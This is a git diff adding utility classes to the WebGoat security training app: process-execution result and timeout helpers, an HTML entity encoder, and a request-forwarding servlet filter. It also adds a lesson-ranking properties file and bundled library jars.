+		needle.trim().toLowerCase(), fromIndex) != -1);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     *@param  value  Description of the Parameter
+     *@return        Description of the Return Value
+     */
+    public boolean errorsContains(String value)
+    {
+	return (errorsContains(value, 0));
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     *@param  value      Description of the Parameter
+     *@param  fromIndex  Description of the Parameter
+     *@return            Description of the Return Value
+     */
+    public boolean errorsContains(String value, int fromIndex)
+    {
+	return (contains(myErrors, value, fromIndex));
+    }
+
+
+    /**
+     *  Gets the error attribute of the ExecResults object
+     *
+     *@return    The error value
+     */
+    public boolean getError()
+    {
+	return (myError);
+    }
+
+
+    /**
+     *  Gets the errorMessage attribute of the ExecResults object
+     *
+     *@return    The errorMessage value
+     */
+    public String getErrorMessage()
+    {
+	switch (getErrorType())
+	{
+	    case THROWABLE:
+		return ("Exception: " + myThrowable.getMessage());
+
+	    case BADRETURNCODE:
+		return ("Bad return code (expected " + mySuccessCode + ")");
+
+	    default:
+		return ("Unknown error");
+	}
+    }
+
+
+    /**
+     *  Gets the errorType attribute of the ExecResults object
+     *
+     *@return    The errorType value
+     */
+    public int getErrorType()
+    {
+	return (myErrorType);
+    }
+
+
+    /**
+     *  Gets the errors attribute of the ExecResults object
+     *
+     *@return    The errors value
+     */
+    public String getErrors()
+    {
+	return (myErrors);
+    }
+
+
+    /**
+     *  Gets the interrupted attribute of the ExecResults object
+     *
+     *@return    The interrupted value
+     */
+    public boolean getInterrupted()
+    {
+	return (myInterrupted);
+    }
+
+
+    /**
+     *  Gets the output attribute of the ExecResults object
+     *
+     *@return    The output value
+     */
+    public String getOutput()
+    {
+	return (myOutput);
+    }
+
+
+    /**
+     *  Gets the returnCode attribute of the ExecResults object
+     *
+     *@return    The returnCode value
+     */
+    public int getReturnCode()
+    {
+	return (myReturnCode);
+    }
+
+
+    /**
+     *  Gets the throwable attribute of the ExecResults object
+     *
+     *@return    The throwable value
+     */
+    public Throwable getThrowable()
+    {
+	return (myThrowable);
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     *@param  value  Description of the Parameter
+     *@return        Description of the Return Value
+     */
+    public boolean outputContains(String value)
+    {
+	return (outputContains(value, 0));
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     *@param  value      Description of the Parameter
+     *@param  fromIndex  Description of the Parameter
+     *@return            Description of the Return Value
+     */
+    public boolean outputContains(String value, int fromIndex)
+    {
+	return (contains(myOutput, value, fromIndex));
+    }
+
+
+    /**
+     *  Sets the error attribute of the ExecResults object
+     *
+     *@param  value  The new error value
+     */
+    public void setError(int value)
+    {
+	myError = true;
+	myErrorType = value;
+    }
+
+
+    /**
+     *  Sets the errors attribute of the ExecResults object
+     *
+     *@param  errors  The new errors value
+     */
+    public void setErrors(String errors)
+    {
+	myErrors = errors.trim();
+    }
+
+
+    /**
+     *  Sets the interrupted attribute of the ExecResults object
+     */
+    public void setInterrupted()
+    {
+	myInterrupted = true;
+    }
+
+
+    /**
+     *  Sets the output attribute of the ExecResults object
+     *
+     *@param  value  The new output value
+     */
+    public void setOutput(String value)
+    {
+	myOutput = value.trim();
+    }
+
+
+    /**
+     *  Sets the returnCode attribute of the ExecResults object
+     *
+     *@param  value  The new returnCode value
+     */
+    public void setReturnCode(int value)
+    {
+	myReturnCode = value;
+    }
+
+
+    /**
+     *  Sets the throwable attribute of the ExecResults object
+     *
+     *@param  value  The new throwable value
+     */
+    public void setThrowable(Throwable value)
+    {
+	setError(THROWABLE);
+	myThrowable = value;
+    }
+
+
+    /**
+     *  Description of the Method
+     *
+     *@return    Description of the Return Value
+     */
+    public String toString()
+    {
+	String sep = System.getProperty("line.separator");
+	StringBuffer value = new StringBuffer();
+	value.append("ExecResults for \'" + myCommand + "\'" + sep);
+
+	if ((myInput != null) && !myInput.equals(""))
+	{
+	    value.append(sep + "Input..." + sep + myInput + sep);
+	}
+
+	if ((myOutput != null) && !myOutput.equals(""))
+	{
+	    value.append(sep + "Output..." + sep + myOutput + sep);
+	}
+
+	if ((myErrors != null) && !myErrors.equals(""))
+	{
+	    value.append(sep + "Errors..." + sep + myErrors + sep);
+	}
+
+	value.append(sep);
+
+	if (myInterrupted)
+	{
+	    value.append("Command timed out after " + (myTimeout / 1000)
+		    + " seconds " + sep);
+	}
+
+	value.append("Returncode: " + myReturnCode + sep);
+
+	if (myError)
+	{
+	    value.append(getErrorMessage() + sep);
+	}
+
+	return (value.toString());
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/util/ExecutionException.java b/main/project/JavaSource/org/owasp/webgoat/util/ExecutionException.java
new file mode 100644
index 000000000..bf2cfcee5
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/util/ExecutionException.java
@@ -0,0 +1,61 @@
+package org.owasp.webgoat.util;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
+ */
+public class ExecutionException extends Exception
+{
+
+    /**
+	 * 
+	 */
+	private static final long serialVersionUID = 7282947463831152092L;
+
+
+	/**
+     *  Constructor for the ExecutionException object
+     */
+    public ExecutionException()
+    {
+	super();
+    }
+
+
+    /**
+     *  Constructor for the ExecutionException object
+     *
+     *@param  msg  Description of the Parameter
+     */
+    public ExecutionException(String msg)
+    {
+	super(msg);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/util/HtmlEncoder.java b/main/project/JavaSource/org/owasp/webgoat/util/HtmlEncoder.java
new file mode 100644
index 000000000..2c613c890
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/util/HtmlEncoder.java
@@ -0,0 +1,225 @@
+package org.owasp.webgoat.util;
+
+import java.util.HashMap;
+import java.util.Map;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ */
+public class HtmlEncoder
+{
+
+    static Map<String, Integer> e2i = new HashMap<String, Integer>();
+
+    static Map<Integer, String> i2e = new HashMap<Integer, String>();
+
+    // html entity list
+    private static Object[][] entities = { { "quot", new Integer(34) }, // " - double-quote
+	    { "amp", new Integer(38) }, // & - ampersand
+	    { "lt", new Integer(60) }, // < - less-than
+	    { "gt", new Integer(62) }, // > - greater-than
+	    { "nbsp", new Integer(160) }, // non-breaking space
+	    { "copy", new Integer(169) }, // © - copyright
+	    { "reg", new Integer(174) }, // ® - registered trademark
+	    { "Agrave", new Integer(192) }, // Ŕ - uppercase A, grave accent
+	    { "Aacute", new Integer(193) }, // Á - uppercase A, acute accent
+	    { "Acirc", new Integer(194) }, // Â - uppercase A, circumflex accent
+	    { "Atilde", new Integer(195) }, // Ă - uppercase A, tilde
+	    { "Auml", new Integer(196) }, // Ä - uppercase A, umlaut
+	    { "Aring", new Integer(197) }, // Ĺ - uppercase A, ring
+	    { "AElig", new Integer(198) }, // Ć - uppercase AE
+	    { "Ccedil", new Integer(199) }, // Ç - uppercase C, cedilla
+	    { "Egrave", new Integer(200) }, // Č - uppercase E, grave accent
+	    { "Eacute", new Integer(201) }, // É - uppercase E, acute accent
+	    { "Ecirc", new Integer(202) }, // Ę - uppercase E, circumflex accent
+	    { "Euml", new Integer(203) }, // Ë - uppercase E, umlaut
+	    { "Igrave", new Integer(204) }, // Ě - uppercase I, grave accent
+	    { "Iacute", new Integer(205) }, // Í - uppercase I, acute accent
+	    { "Icirc", new Integer(206) }, // Î - uppercase I, circumflex accent
+	    { "Iuml", new Integer(207) }, // Ď - uppercase I, umlaut
+	    { "ETH", new Integer(208) }, // Đ - uppercase Eth, Icelandic
+	    { "Ntilde", new Integer(209) }, // Ń - uppercase N, tilde
+	    { "Ograve", new Integer(210) }, // Ň - uppercase O, grave accent
+	    { "Oacute", new Integer(211) }, // Ó - uppercase O, acute accent
+	    { "Ocirc", new Integer(212) }, // Ô - uppercase O, circumflex accent
+	    { "Otilde", new Integer(213) }, // Ő - uppercase O, tilde
+	    { "Ouml", new Integer(214) }, // Ö - uppercase O, umlaut
+	    { "Oslash", new Integer(216) }, // Ř - uppercase O, slash
+	    { "Ugrave", new Integer(217) }, // Ů - uppercase U, grave accent
+	    { "Uacute", new Integer(218) }, // Ú - uppercase U, acute accent
+	    { "Ucirc", new Integer(219) }, // Ű - uppercase U, circumflex accent
+	    { "Uuml", new Integer(220) }, // Ü - uppercase U, umlaut
+	    { "Yacute", new Integer(221) }, // Ý - uppercase Y, acute accent
+	    { "THORN", new Integer(222) }, // Ţ - uppercase THORN, Icelandic
+	    { "szlig", new Integer(223) }, // ß - lowercase sharps, German
+	    { "agrave", new Integer(224) }, // ŕ - lowercase a, grave accent
+	    { "aacute", new Integer(225) }, // á - lowercase a, acute accent
+	    { "acirc", new Integer(226) }, // â - lowercase a, circumflex accent
+	    { "atilde", new Integer(227) }, // ă - lowercase a, tilde
+	    { "auml", new Integer(228) }, // ä - lowercase a, umlaut
+	    { "aring", new Integer(229) }, // ĺ - lowercase a, ring
+	    { "aelig", new Integer(230) }, // ć - lowercase ae
+	    { "ccedil", new Integer(231) }, // ç - lowercase c, cedilla
+	    { "egrave", new Integer(232) }, // č - lowercase e, grave accent
+	    { "eacute", new Integer(233) }, // é - lowercase e, acute accent
+	    { "ecirc", new Integer(234) }, // ę - lowercase e, circumflex accent
+	    { "euml", new Integer(235) }, // ë - lowercase e, umlaut
+	    { "igrave", new Integer(236) }, // ě - lowercase i, grave accent
+	    { "iacute", new Integer(237) }, // í - lowercase i, acute accent
+	    { "icirc", new Integer(238) }, // î - lowercase i, circumflex accent
+	    { "iuml", new Integer(239) }, // ď - lowercase i, umlaut
+	    { "igrave", new Integer(236) }, // ě - lowercase i, grave accent
+	    { "iacute", new Integer(237) }, // í - lowercase i, acute accent
+	    { "icirc", new Integer(238) }, // î - lowercase i, circumflex accent
+	    { "iuml", new Integer(239) }, // ď - lowercase i, umlaut
+	    { "eth", new Integer(240) }, // đ - lowercase eth, Icelandic
+	    { "ntilde", new Integer(241) }, // ń - lowercase n, tilde
+	    { "ograve", new Integer(242) }, // ň - lowercase o, grave accent
+	    { "oacute", new Integer(243) }, // ó - lowercase o, acute accent
+	    { "ocirc", new Integer(244) }, // ô - lowercase o, circumflex accent
+	    { "otilde", new Integer(245) }, // ő - lowercase o, tilde
+	    { "ouml", new Integer(246) }, // ö - lowercase o, umlaut
+	    { "oslash", new Integer(248) }, // ř - lowercase o, slash
+	    { "ugrave", new Integer(249) }, // ů - lowercase u, grave accent
+	    { "uacute", new Integer(250) }, // ú - lowercase u, acute accent
+	    { "ucirc", new Integer(251) }, // ű - lowercase u, circumflex accent
+	    { "uuml", new Integer(252) }, // ü - lowercase u, umlaut
+	    { "yacute", new Integer(253) }, // ý - lowercase y, acute accent
+	    { "thorn", new Integer(254) }, // ţ - lowercase thorn, Icelandic
+	    { "yuml", new Integer(255) }, // ˙ - lowercase y, umlaut
+	    { "euro", new Integer(8364) },// Euro symbol
+    };
+
+
+    public HtmlEncoder()
+    {
+	for (int i = 0; i < entities.length; i++)
+	    e2i.put((String)entities[i][0], (Integer)entities[i][1]);
+	for (int i = 0; i < entities.length; i++)
+	    i2e.put((Integer)entities[i][1], (String)entities[i][0]);
+    }
+
+
+    /**
+     *  Turns funky characters into HTML entity equivalents<p>
+     *
+     *  e.g. <tt>"bread" & "butter"</tt> => <tt>&amp;quot;bread&amp;quot; &amp;amp;
+     *  &amp;quot;butter&amp;quot;</tt> . Update: supports nearly all HTML entities, including funky
+     *  accents. See the source code for more detail. Adapted from
+     *  http://www.purpletech.com/code/src/com/purpletech/util/Utils.java.
+     *
+     * @param  s1  Description of the Parameter
+     * @return     Description of the Return Value
+     */
+    public static String encode(String s1)
+    {
+	StringBuffer buf = new StringBuffer();
+
+	int i;
+	for (i = 0; i < s1.length(); ++i)
+	{
+	    char ch = s1.charAt(i);
+
+	    String entity = i2e.get(new Integer((int) ch));
+
+	    if (entity == null)
+	    {
+		if (((int) ch) > 128)
+		{
+		    buf.append("&#" + ((int) ch) + ";");
+		}
+		else
+		{
+		    buf.append(ch);
+		}
+	    }
+	    else
+	    {
+		buf.append("&" + entity + ";");
+	    }
+	}
+
+	return buf.toString();
+    }
+
+
+    /**
+     *  Given a string containing entity escapes, returns a string containing the actual Unicode
+     *  characters corresponding to the escapes. Adapted from
+     *  http://www.purpletech.com/code/src/com/purpletech/util/Utils.java.
+     *
+     * @param  s1  Description of the Parameter
+     * @return     Description of the Return Value
+     */
+    public static String decode(String s1)
+    {
+	StringBuffer buf = new StringBuffer();
+
+	int i;
+	for (i = 0; i < s1.length(); ++i)
+	{
+	    char ch = s1.charAt(i);
+
+	    if (ch == '&')
+	    {
+		int semi = s1.indexOf(';', i + 1);
+		if (semi == -1)
+		{
+		    buf.append(ch);
+		    continue;
+		}
+		String entity = s1.substring(i + 1, semi);
+		Integer iso;
+		if (entity.charAt(0) == '#')
+		{
+		    iso = new Integer(entity.substring(1));
+		}
+		else
+		{
+		    iso = e2i.get(entity);
+		}
+		if (iso == null)
+		{
+		    buf.append("&" + entity + ";");
+		}
+		else
+		{
+		    buf.append((char) (iso.intValue()));
+		}
+		i = semi;
+	    }
+	    else
+	    {
+		buf.append(ch);
+	    }
+	}
+
+	return buf.toString();
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/util/Interceptor.java b/main/project/JavaSource/org/owasp/webgoat/util/Interceptor.java
new file mode 100644
index 000000000..9ddd00a37
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/util/Interceptor.java
@@ -0,0 +1,153 @@
+/**
+ * 
+ */
+package org.owasp.webgoat.util;
+
+import java.io.IOException;
+import java.io.BufferedReader;
+import java.io.PrintWriter;
+import java.io.InputStreamReader;
+import java.net.UnknownHostException;
+
+import java.net.Socket;
+
+import javax.servlet.Filter;
+import javax.servlet.FilterChain;
+import javax.servlet.FilterConfig;
+import javax.servlet.ServletException;
+import javax.servlet.ServletRequest;
+import javax.servlet.ServletResponse;
+import javax.servlet.RequestDispatcher;
+import javax.servlet.http.HttpServletRequest;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author sherif koussa - Macadamian Technologies
+ *
+ */
+public class Interceptor implements Filter
+{
+
+    private static final String OSG_SERVER_NAME = "OSGServerName";
+
+    private static final String OSG_SERVER_PORT = "OSGServerPort";
+
+
+    /* (non-Javadoc)
+     * @see javax.servlet.Filter#destroy()
+     */
+    public void destroy()
+    {
+    // TODO Auto-generated method stub
+
+    }
+
+
+    public void doFilter(ServletRequest request, ServletResponse response,
+	    FilterChain chain) throws IOException, ServletException
+    {
+
+	HttpServletRequest req = (HttpServletRequest) request;
+
+	Socket osgSocket = null;
+	PrintWriter out = null;
+	BufferedReader in = null;
+	String osgServerName = req.getSession().getServletContext()
+		.getInitParameter(OSG_SERVER_NAME);
+	String osgServerPort = req.getSession().getServletContext()
+		.getInitParameter(OSG_SERVER_PORT);
+
+	try
+	{
+	    //If these parameters are not defined then no communication will happen with OSG
+	    if (osgServerName != null && osgServerName.length() != 0
+		    && osgServerPort != null && osgServerPort.length() != 0)
+	    {
+		osgSocket = new Socket(osgServerName, Integer
+			.parseInt(osgServerPort));
+		if (osgSocket != null)
+		{
+		    out = new PrintWriter(osgSocket.getOutputStream(), true);
+		    in = new BufferedReader(new InputStreamReader(osgSocket
+			    .getInputStream()));
+		    //String message = "HTTPRECEIVEHTTPREQUEST,-,DataValidation_SqlInjection_Basic.aspx";
+		    //out.println(message);
+
+		    //System.out.println(in.readLine());
+		}
+	    }
+
+	}
+	catch (UnknownHostException e)
+	{
+	    e.printStackTrace();
+
+	}
+	catch (IOException e)
+	{
+	    e.printStackTrace();
+	}
+	finally
+	{
+	    if (out != null)
+	    {
+		out.close();
+	    }
+	    if (in != null)
+	    {
+		in.close();
+	    }
+	    if (osgSocket != null)
+	    {
+		osgSocket.close();
+	    }
+	}
+
+	String url = req.getRequestURL().toString();
+
+	RequestDispatcher disp = req.getRequestDispatcher(url.substring(url
+		.lastIndexOf("WebGoat/")
+		+ "WebGoat".length()));
+
+	disp.forward(request, response);
+
+    }
+
+
+    /* (non-Javadoc)
+     * @see javax.servlet.Filter#init(javax.servlet.FilterConfig)
+     */
+    public void init(FilterConfig arg0) throws ServletException
+    {
+    // TODO Auto-generated method stub
+
+    }
+
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/util/ThreadWatcher.java b/main/project/JavaSource/org/owasp/webgoat/util/ThreadWatcher.java
new file mode 100644
index 000000000..fdd4f6a42
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/util/ThreadWatcher.java
@@ -0,0 +1,117 @@
+package org.owasp.webgoat.util;
+
+import java.util.BitSet;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ *@author     jwilliams@aspectsecurity.com
+ *@created    November 6, 2002
+ */
+public class ThreadWatcher implements Runnable
+{
+
+    // time to live in milliseconds
+    private BitSet myInterrupted;
+
+    private Process myProcess;
+
+    private int myTimeout;
+
+
+    /**
+     *  Constructor for the ThreadWatcher object
+     *
+     *@param  p            Description of the Parameter
+     *@param  interrupted  Description of the Parameter
+     *@param  timeout      Description of the Parameter
+     */
+    public ThreadWatcher(Process p, BitSet interrupted, int timeout)
+    {
+	myProcess = p;
+
+	// thread used by whoever constructed this watcher
+	myTimeout = timeout;
+	myInterrupted = interrupted;
+    }
+
+
+    /*
+     *  Interrupt the thread by marking the interrupted bit and killing the process
+     */
+
+    /**
+     *  Description of the Method
+     */
+    public void interrupt()
+    {
+	myInterrupted.set(0);
+
+	// set interrupted bit (bit 0 of the bitset) to 1
+	myProcess.destroy();
+
+	/*
+	 *  try
+	 *  {
+	 *  myProcess.getInputStream().close();
+	 *  }
+	 *  catch( IOException e1 )
+	 *  {
+	 *  / do nothing -- input streams are probably already closed
+	 *  }
+	 *  try
+	 *  {
+	 *  myProcess.getErrorStream().close();
+	 *  }
+	 *  catch( IOException e2 )
+	 *  {
+	 *  / do nothing -- input streams are probably already closed
+	 *  }
+	 *  myThread.interrupt();
+	 */
+    }
+
+
+    /**
+     *  Main processing method for the ThreadWatcher object
+     */
+    public void run()
+    {
+	try
+	{
+	    Thread.sleep(myTimeout);
+	}
+	catch (InterruptedException e)
+	{
+	    // do nothing -- if watcher is interrupted, so is thread
+	}
+
+	interrupt();
+    }
+}
diff --git a/main/project/WebContent/META-INF/MANIFEST.MF b/main/project/WebContent/META-INF/MANIFEST.MF
new file mode 100644
index 000000000..348f1bdd3
--- /dev/null
+++ b/main/project/WebContent/META-INF/MANIFEST.MF
@@ -0,0 +1 @@
+Manifest-Version: 1.0
\ No newline at end of file
diff --git a/main/project/WebContent/WEB-INF/Copy of webgoat.properties b/main/project/WebContent/WEB-INF/Copy of webgoat.properties
new file mode 100644
index 000000000..c6050233b
--- /dev/null
+++ b/main/project/WebContent/WEB-INF/Copy of webgoat.properties	
@@ -0,0 +1,52 @@
+category.General.ranking=11
+lesson.HttpBasics.ranking=10
+lesson.ThreadSafetyProblem.ranking=20
+
+category.Broken\ Authentication\ and\ Session\ Management.ranking=21
+lesson.BasicAuthentication.ranking=10
+lesson.WeakAuthenticationCookie.ranking=20
+
+category.Broken\ Access\ Control.ranking=31
+lesson.AccessControlMatrix.ranking=10
+lesson.PathBasedAccessControl.ranking=20
+lesson.RoleBasedAccessControl.hidden=true
+
+category.Cross-Site\ Scripting\ (XSS).ranking=41
+lesson.StoredXss.ranking=10
+lesson.ReflectedXSS.ranking=20
+lesson.CrossSiteScripting.hidden=true
+
+category.Unvalidated\ Parameters.ranking=51
+lesson.HiddenFieldTampering.ranking=10
+lesson.JavaScriptValidation.ranking=20
+lesson.UncheckedEmail.ranking=30
+
+category.Insecure\ Storage.ranking=61
+lesson.Encoding.ranking=10
+
+category.Injection\ Flaws.ranking=71
+lesson.SqlNumericInjection.ranking=10
+lesson.SqlStringInjection.ranking=20
+lesson.CommandInjection.ranking=30
+lesson.SQLInjection.hidden=true
+
+category.Improper\ Error\ Handling.ranking=81
+lesson.FailOpenAuthentication.ranking=10
+
+category.Code\ Quality.ranking=91
+lesson.HtmlClues.ranking=10
+
+category.Web\ Services.category.ranking=101
+lesson.SoapRequest.ranking=10
+lesson.WSDLScanning.ranking=20
+lesson.WsSqlInjection.ranking=30
+
+lesson.WeakSessionID.hidden=true
+lesson.BufferOverflow.hidden=true
+lesson.BlindSqlInjection.hidden=true
+lesson.DOS_Login.hidden=true
+lesson.ForcedBrowsing.hidden=true
+lesson.ForgotPassword.hidden=true
+lesson.ParameterInjection.hidden=true
+lesson.RemoteAdminFlaw.hidden=true
+lesson.ChallengeScreen.hidden=true
\ No newline at end of file
diff --git a/main/project/WebContent/WEB-INF/lib/activation.jar b/main/project/WebContent/WEB-INF/lib/activation.jar
new file mode 100644
index 000000000..29a59a9ee
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/activation.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/axis-ant.jar b/main/project/WebContent/WEB-INF/lib/axis-ant.jar
new file mode 100644
index 000000000..dadfa3bc9
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/axis-ant.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/axis.jar b/main/project/WebContent/WEB-INF/lib/axis.jar
new file mode 100644
index 000000000..b81517306
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/axis.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/catalina.jar b/main/project/WebContent/WEB-INF/lib/catalina.jar
new file mode 100644
index 000000000..833d7475d
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/catalina.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/commons-collections-3.1.jar b/main/project/WebContent/WEB-INF/lib/commons-collections-3.1.jar
new file mode 100644
index 000000000..41e230fee
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/commons-collections-3.1.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/commons-digester.jar b/main/project/WebContent/WEB-INF/lib/commons-digester.jar
new file mode 100644
index 000000000..312be0235
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/commons-digester.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/commons-discovery-0.2.jar b/main/project/WebContent/WEB-INF/lib/commons-discovery-0.2.jar
new file mode 100644
index 000000000..b88554847
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/commons-discovery-0.2.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/commons-logging-1.0.4.jar b/main/project/WebContent/WEB-INF/lib/commons-logging-1.0.4.jar
new file mode 100644
index 000000000..b73a80fab
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/commons-logging-1.0.4.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/dsn.jar b/main/project/WebContent/WEB-INF/lib/dsn.jar
new file mode 100644
index 000000000..0ff12f85c
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/dsn.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/ecs-1.4.2.jar b/main/project/WebContent/WEB-INF/lib/ecs-1.4.2.jar
new file mode 100644
index 000000000..e5a9fc212
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/ecs-1.4.2.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/hsqldb.jar b/main/project/WebContent/WEB-INF/lib/hsqldb.jar
new file mode 100644
index 000000000..850ab21f1
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/hsqldb.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/imap.jar b/main/project/WebContent/WEB-INF/lib/imap.jar
new file mode 100644
index 000000000..1cff24fda
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/imap.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/j2h.jar b/main/project/WebContent/WEB-INF/lib/j2h.jar
new file mode 100644
index 000000000..18fdbc91d
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/j2h.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/jaxrpc.jar b/main/project/WebContent/WEB-INF/lib/jaxrpc.jar
new file mode 100644
index 000000000..56c435e79
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/jaxrpc.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/jta-spec1_0_1.jar b/main/project/WebContent/WEB-INF/lib/jta-spec1_0_1.jar
new file mode 100644
index 000000000..705e8c81c
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/jta-spec1_0_1.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/jtds-1.2.2.jar b/main/project/WebContent/WEB-INF/lib/jtds-1.2.2.jar
new file mode 100644
index 000000000..d0d8c9570
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/jtds-1.2.2.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/log4j-1.2.8.jar b/main/project/WebContent/WEB-INF/lib/log4j-1.2.8.jar
new file mode 100644
index 000000000..493a3ccc1
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/log4j-1.2.8.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/mail.jar b/main/project/WebContent/WEB-INF/lib/mail.jar
new file mode 100644
index 000000000..59543774f
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/mail.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/mailapi.jar b/main/project/WebContent/WEB-INF/lib/mailapi.jar
new file mode 100644
index 000000000..06fc475ac
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/mailapi.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/ojdbc14.jar b/main/project/WebContent/WEB-INF/lib/ojdbc14.jar
new file mode 100755
index 000000000..0aa1b519e
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/ojdbc14.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/pop3.jar b/main/project/WebContent/WEB-INF/lib/pop3.jar
new file mode 100644
index 000000000..7ad2d33e6
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/pop3.jar differ
diff --git a/main/project/WebContent/WEB-INF/lib/saaj.jar b/main/project/WebContent/WEB-INF/lib/saaj.jar
new file mode 100644
index 000000000..dd240639f
Binary files /dev/null and b/main/project/WebContent/WEB-INF/lib/saaj.jar differ
